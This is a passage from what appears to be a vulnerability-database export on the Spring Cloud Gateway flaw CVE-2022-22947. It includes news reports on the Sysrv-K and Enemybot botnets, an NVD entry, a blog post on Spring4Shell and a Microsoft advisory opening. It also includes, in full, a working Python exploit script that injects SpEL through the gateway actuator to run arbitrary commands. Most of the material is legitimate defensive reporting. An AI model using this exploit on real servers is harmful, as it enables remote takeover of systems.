"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-17T10:22:57", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEicZ3YCqRUQhUZkpqbOdBQhVsgIeNcHh1FbdjTs_6yJWhzD84fQd-AX9EMJ9IQBzfUPW7ncPd_Cd15TrK0wldMRabU5qAKxZFXl3P-q3fNKZSSk3W8I8z_xZJDtHdwzN-eaA8LMpCwQd7HsTySNS-tKSGZWS5-YqYIbpL4MQXUGchl_0U7SrPKCB0U_/s728-e100/iot-botnet-malware.png>)\n\nMicrosoft is warning of a new variant of the **srv botnet** that's exploiting multiple security flaws in web applications and databases to install coin miners on both Windows and Linux systems.\n\nThe tech giant, which has called the new version **Sysrv-K**, is said to weaponize an [array of exploits](<https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence>) to gain control of web servers. The cryptojacking botnet first emerged in December 2020.\n\n\"Sysrv-K scans the internet to find web servers with various vulnerabilities to install itself,\" the company [said](<https://twitter.com/MsftSecIntel/status/1525158219206860801>) in a series of tweets. \"The vulnerabilities range from path traversal and remote file disclosure to arbitrary file download and remote code execution vulnerabilities.\"\n\nThis also includes [CVE-2022-22947](<https://tanzu.vmware.com/security/cve-2022-22947>) (CVSS score: 10.0), a code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host via a maliciously crafted request.\n\nIt's worth noting that the abuse of CVE-2022-22947 has prompted the U.S. Cybersecurity and Infrastructure Security Agency to add the flaw to its [Known Exploited Vulnerabilities Catalog](<https://thehackernews.com/2022/05/watch-out-hackers-begin-exploiting.html>).\n\nA key differentiator is that Sysrv-K scans for WordPress configuration files and their backups to fetch database credentials, which are then used to hijack web servers. It's also said to have upgraded its command-and-control communication functions to make use of a [Telegram Bot](<https://thehackernews.com/2022/05/researchers-warn-of-eternity-project.html>).\n\nOnce infected, lateral movement is facilitated through [SSH keys](<https://en.wikipedia.org/wiki/Secure_Shell>) available on the victim machine to deploy copies of the malware to other systems and grow the botnet's size, effectively putting the entire network at risk.\n\n\"The Sysrv malware takes advantage of known vulnerabilities to spread their Cryptojacking malware,\" Lacework Labs researchers [noted](<https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/>) last year. \"Ensuring public facing applications are kept up to date with the latest security patches is critical to avoid opportunistic adversaries from compromising systems.\"\n\nBesides securing internet-exposed servers, Microsoft is additionally advising organizations to apply security updates in a timely fashion and build credential hygiene to reduce risk.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-17T09:37:00", "type": "thn", "title": "New Sysrv Botnet Variant Hijacking Windows and Linux with Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-17T09:37:49", "id": "THN:A256C18D45C73FAE1CA7A079253D9D10", "href": "https://thehackernews.com/2022/05/new-sysrv-botnet-variant-hijacking.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-17T04:22:57", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhIGKFPN0camWO34C8CoXpDcrZclcT7c6-ypv1tJcY-mfhQARONnbO0PaDlZboql9V42YAGaZgoPskGrVz5tPzQqvfdgYybZ-X2zOlmjtLVkz9OH5WANIuEnYBVQc30Kolkv9Rtc75D-jj23bTt3pHK7G32wtGGb5Nb8OWMmKPNyPHPG4WsAjmBdYDm/s728-e100/firewall.jpg>) \n--- \nImage source: [z3r00t](<https://twitter.com/z3r00t/status/1524952406139748359>) \n \nThe U.S. Cybersecurity and Infrastructure Security Agency on Monday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/16/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing evidence of active exploitation.\n\nTracked as [CVE-2022-30525](<https://thehackernews.com/2022/05/zyxel-releases-patch-for-critical.html>), the vulnerability is rated 9.8 for severity and relates to a command injection flaw in select versions of the Zyxel firewall that could enable an unauthenticated adversary to execute arbitrary commands on the underlying operating system.\n\nImpacted devices include -\n\n * USG FLEX 100, 100W, 200, 500, 700\n * USG20-VPN, USG20W-VPN\n * ATP 100, 200, 500, 700, 800, and\n * VPN series\n\nThe issue, for which patches were released by the Taiwanese firm in late April (ZLD V5.30), became public knowledge on May 12 following a coordinated disclosure process with Rapid7.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj1WgS1ZJQACshVW-DJuxbFN1iHDnt93hQWGDuUdrvFT4dN9O8VSRWqAhjBgBDvYEOeuWDABBmMFdDdZjPtw8HVPmDj4N9WfJc1aC7gLju41YxO0oHtqBseAEBBTmgg29o4K2uVe5SNz5zIxmHk_wjNbUHTIlA8zl4nN8jjTHbQqSwId4h-uhDHrVx5/s728-e100/france.jpg>) \n--- \nSource: [Shadowserver](<https://twitter.com/Shadowserver/status/1525771529941921792>) \n \n \nMerely a day later, the Shadowserver Foundation [said](<https://twitter.com/Shadowserver/status/1525561213115158529>) it began detecting exploitation attempts, with most of the vulnerable appliances located in France, Italy, the U.S., Switzerland, and Russia.\n\nAlso added by CISA to the catalog is [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>), another code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host by means of a specially crafted request.\n\nThe vulnerability is rated 10 out of 10 on the CVSS vulnerability scoring system and has since been [addressed](<https://tanzu.vmware.com/security/cve-2022-22947>) in Spring Cloud Gateway versions 3.1.1 or later and 3.0.7 or later as of March 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-17T03:17:00", "type": "thn", "title": "Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947", "CVE-2022-30525"], "modified": "2022-05-17T03:24:22", "id": "THN:EC08545A59E5E648DC06498AB3111060", "href": "https://thehackernews.com/2022/05/watch-out-hackers-begin-exploiting.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T05:56:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiBs1v_UBB96XLwx1fhDB24ftZm1R62Ku1955ZGISzLISuse4t_qn4dHBN2z84qTMZzGt97CTTgScoGr9eBOu00Vwlfa9yOw-qRRAXiPJRy7VQLYUNELMAusESXMjCUTEAFj0EPHqLPRnwAtLbNPQLys8F4CDIVvGrmmJqXok_igJowzJPNKzVrBOoL/s728-e100/code.jpg>)\n\nA nascent Linux-based botnet named **Enemybot** has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).\n\n\"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,\" AT&amp;T Alien Labs [said](<https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers>) in a technical write-up published last week. \"Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices.\"\n\nFirst disclosed by [Securonix](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>) in March and later by [Fortinet](<https://thehackernews.com/2022/04/new-enemybot-ddos-botnet-borrows.html>), Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.\n\nEnemybot, which is capable of carrying out [DDoS attacks](<https://en.wikipedia.org/wiki/Denial-of-service_attack>), draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it's made up of four different components -\n\n * A Python module to download dependencies and compile the malware for different OS architectures\n * The core botnet section\n * An obfuscation segment designed to encode and decode the malware's strings, and\n * A command-and-control functionality to receive attack commands and fetch additional payloads\n\n\"In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing [a] shell command,\" the researchers said, pointing to a new \"adb_infect\" function. ADB refers to [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>), a command-line utility used to communicate with an Android device.\n\nAlso incorporated is a new scanner function that's engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgpc96pQMDAAqWfH85fEsGBf1xrj8m3a3gH9va1i7k-HmTzikPIzZGImKevqb3wxvW1wxFjhDs9J_Ii1xzSUdJpYaornlzqm5NOU8GCTzKMJoo7Tqy4kafPPjw7fLOUT5fXucBVfCUjMjn5-J2dr2U9992Sbsa-mLLWhevc7-l6Uqf_7AeQGz1sDvTF/s728-e100/goip.jpg>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoCVQLY8Ozew4EQYe8whasxaFqzk8QnTX4P9wTrhC5kmGUuAW_20VD-gaPJ2Y9A-2hcLTSgVGc9UP7K9407c24ypTfJHRJvPoem7rVVTe50pMIY4MB-3dCwJ3rqYVc6BjGkU7_AGfuC5xLyp9rDp0g1R06cvFDa-Mxzow3EU9txlmSQAXEwuoIZQKn/s728-e100/log4j.jpg>)\n\nBesides the [Log4Shell vulnerabilities](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access ([CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>)), and F5 BIG-IP ([CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>)) as well as weaknesses in WordPress plugins like Video Synchro PDF.\n\nOther weaponized security shortcomings are below -\n\n * [**CVE-2022-22947**](<https://thehackernews.com/2022/05/new-sysrv-botnet-variant-hijacking.html>) (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway\n * [**CVE-2021-4039**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4039>) (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware\n * [**CVE-2022-25075**](<https://nvd.nist.gov/vuln/detail/CVE-2022-25075>) (CVSS score: 9.8) - A command injection vulnerability in TOTOLink A3000RU wireless router\n * [**CVE-2021-36356**](<https://nvd.nist.gov/vuln/detail/CVE-2021-36356>) (CVSS score: 9.8) - A remote code execution vulnerability in KRAMER VIAware\n * [**CVE-2021-35064**](<https://nvd.nist.gov/vuln/detail/CVE-2021-35064>) (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAWare\n * [**CVE-2020-7961**](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>) (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal\n\nWhat's more, the botnet's source code has been shared on GitHub, making it widely available to other threat actors. \"I assume no responsibility for any damages caused by this program,\" the project's README file [reads](<https://github.com/freakanonymous/enemy>). \"This is posted under Apache license and is also considered art.\"\n\n\"Keksec's Enemybot appears to be just starting to spread, however due to the authors' rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,'' the researchers said.\n\n\"This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-30T10:30:00", "type": "thn", "title": "EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7961", "CVE-2021-35064", "CVE-2021-36356", "CVE-2021-4039", "CVE-2022-1388", "CVE-2022-22947", "CVE-2022-22954", "CVE-2022-25075"], "modified": "2022-05-31T04:11:39", "id": "THN:A4284A3BA2971D8DA287C1A8393ECAC8", "href": "https://thehackernews.com/2022/05/enemybot-linux-botnet-now-exploits-web.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-04-20T05:57:42", "description": "In spring cloud gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T22:15:00", "type": "cve", "title": "CVE-2022-22947", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-20T00:16:00", "cpe": ["cpe:/a:vmware:spring_cloud_gateway:3.1.0"], "id": "CVE-2022-22947", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22947", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:spring_cloud_gateway:3.1.0:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2022-03-17T20:06:52", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T00:00:00", "type": "zdt", "title": "Spring Cloud Gateway 3.1.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-07T00:00:00", "id": "1337DAY-ID-37446", "href": "https://0day.today/exploit/description/37446", "sourceData": "# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)\n# Exploit Author: Carlos E. Vieira\n# Vendor Homepage: https://spring.io/\n# Software Link: https://spring.io/projects/spring-cloud-gateway\n# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1\n# Tested on: 3.1.0\n# CVE : CVE-2022-22947\n\nimport random\nimport string\nimport requests\nimport json\nimport sys\nimport urllib.parse\nimport base64\n\nheaders = { \"Content-Type\": \"application/json\" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}\nproxies = {\n 'http': 'http://172.29.32.1:8081',\n 'https': 'http://172.29.32.1:8081',\n}\nid = ''.join(random.choice(string.ascii_lowercase) for i in range(8))\n\ndef exploit(url, command):\n \n payload = { \"id\": id, \"filters\": [{ \"name\": \"AddResponseHeader\", \"args\": { \"name\": \"Result\", \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\\u0022\"+command+\"\\u0022).getInputStream()))}\"}}],\"uri\": \"http://example.com\"}\n \n commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')\n\n rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)\n if(rbase.status_code == 201):\n print(\"[+] Stage deployed to /actuator/gateway/routes/\"+id)\n print(\"[+] Executing command...\")\n r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)\n if(r.status_code == 200):\n print(\"[+] getting result...\")\n r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\n if(r.status_code == 200):\n get_response = r.json()\n clean(url, id)\n return get_response['filters'][0].split(\"'\")[1]\n else:\n print(\"[-] Error: Invalid response\")\n clean(url, id)\n exit(1)\n else:\n clean(url, id)\n print(\"[-] Error executing command\")\n\n \ndef clean(url, id):\n remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\n if(remove.status_code == 200):\n print(\"[+] Stage removed!\")\n else:\n print(\"[-] Error: Fail to remove stage\")\n\ndef banner():\n print(\"\"\"\n ###################################################\n # #\n # Exploit for CVE-2022-22947 #\n # - Carlos Vieira (Crowsec) #\n # #\n # Usage: #\n # python3 exploit.py <url> <command> #\n # #\n # Example: #\n # python3 exploit.py http://localhost:8080 'id' #\n # #\n ###################################################\n \"\"\")\n\ndef main():\n banner()\n if len(sys.argv) != 3:\n print(\"[-] Error: Invalid arguments\")\n print(\"[-] Usage: python3 exploit.py <url> <command>\")\n exit(1)\n else:\n url = sys.argv[1]\n command = sys.argv[2]\n print(exploit(url, command))\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/37446", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-04-06T15:11:45", "description": "Hello everyone! This episode will be about last week&#x27;s high-profile vulnerabilities in Spring. Let&#x27;s figure out what happened.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239078>\n\nOf course, it&#x27;s amazing how fragmented the software development world has become. Now there are so many technologies, programming languages, libraries and frameworks! It becomes very difficult to keep them all in sight. Especially if it&#x27;s not the stack you use every day. Entropy keeps growing every year. Programmers are relying more and more on off-the-shelf libraries and frameworks, even where it may not be fully justified. And vulnerabilities in these off-the-shelf components lead to huge problems. So it was in the case of a very critical Log4Shell vulnerability, so it may be in the case of Spring vulnerabilities.\n\n[Spring](<https://spring.io/>) is a set of products that are used for Java development. They are developed and maintained by VMware. The main one is Spring Framework. But there are a lot of them, [at least 21 on the website](<https://spring.io/projects/spring-framework>). And because Spring belongs to VMware, you can find a description of the vulnerabilities on the [VMware Tanzu website](<https://tanzu.vmware.com/security>). VMware Tanzu is a suite of products that helps users run and manage multiple Kubernetes (K8S) clusters across public and private \u201cclouds\u201d. Spring is apparently also part of this suite and therefore Spring vulnerabilities are published there. Let&#x27;s look at the 3 most serious vulnerabilities published in the last month.\n\n## **[CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>): &quot;Spring4Shell&quot;, Spring Framework remote code execution (RCE) via Data Binding on JDK 9+**\n\nSpring Core Framework is widely used in Java applications. It allows software developers to develop Java applications with enterprise-level components effortlessly. \n\nSpring4Shell vulnerability allows remote attackers to plant a web shell when running Spring Framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger and allow full remote access. In fact it is a patch bypass of the old CVE-2010-1622 vulnerability that was introduced 12 years ago.\n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. \n\nThe specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, that is the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n\n * JDK 9 or higher\n * Apache Tomcat as the Servlet container\n * Packaged as WAR\n * spring-webmvc or spring-webflux dependency\n * Spring Framework 5.3.0 to 5.3.17, 5.2.0 to 5.2.19. Older, unsupported versions are also affected\n\nThere are [signs of exploitation in the wild](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>) for this vulnerability. There are more than 30 repositories with [PoC and examples of vulnerable applications on github](<https://github.com/search?q=CVE-2022-22965>). \n\nIn short, look for Spring Framework applications on your Tomcats and then update them to version 5.3.18 and 5.2.20. \n\nQualys [recommendations for Linux](<https://blog.qualys.com/vulnerabilities-threat-research/2022/03/31/spring-framework-zero-day-remote-code-execution-spring4shell-vulnerability>):\n\n * Find java 9+ with `locate`\n * Find &quot;`spring-webmvc-*.jar`&quot;, &quot;`spring-webflux*.jar`&quot; or &quot;`spring-boot*.jar`&quot; in `ls -l /proc/*/fd`\n\nAs an option, you can try to update the Tomcats first. it is easier. While CVE-2022-22965 resides in the Spring Framework, the Apache Tomcat team [released new versions of Tomcat](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>) to \u201dclose the attack vector on Tomcat\u2019s side.\u201d \n\nThe remaining two vulnerabilities are in rarer components that are not part of the Spring Core Framework.\n\n## [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>): Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nSpring Cloud Function is a serverless framework for implementing business logic via functions.\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. Users of affected versions should upgrade to 3.1.7, 3.2.3. No other steps are necessary. \n\nThere are also [PoCs for this vulnerability](<https://github.com/me2nuk/CVE-2022-22963>). \n\nAnd finally, I would like to finish with a vulnerability that came out a month ago. And went quite unnoticed.\n\n## [CVE-2022-22947](<https://tanzu.vmware.com/security/cve-2022-22947>): Spring Cloud Gateway Code Injection Vulnerability\n\nSpring Cloud Gateway aims to provide a simple, yet effective way to route to APIs and provide cross cutting concerns to them such as: security, monitoring/metrics, and resiliency.\n\nApplications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\nUsers of affected versions should apply the following remediation. 3.1.x users should upgrade to 3.1.1+. 3.0.x users should upgrade to 3.0.7+. If the Gateway actuator endpoint is not needed it should be disabled via management.endpoint.gateway.enabled: false.\n\nThere are also PoCs for this vulnerability not only in Github, but [also in public packs](<https://vulners.com/exploitdb/EDB-ID:50799>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:15:45", "type": "avleonov", "title": "Spring4Shell, Spring Cloud Function RCE and Spring Cloud Gateway Code Injection", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T00:15:45", "id": "AVLEONOV:D75470B5417CEFEE479C9D8FAE754F1C", "href": "https://avleonov.com/2022/04/03/spring4shell-spring-cloud-function-rce-and-spring-cloud-gateway-code-injection/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2022-04-11T23:40:15", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server 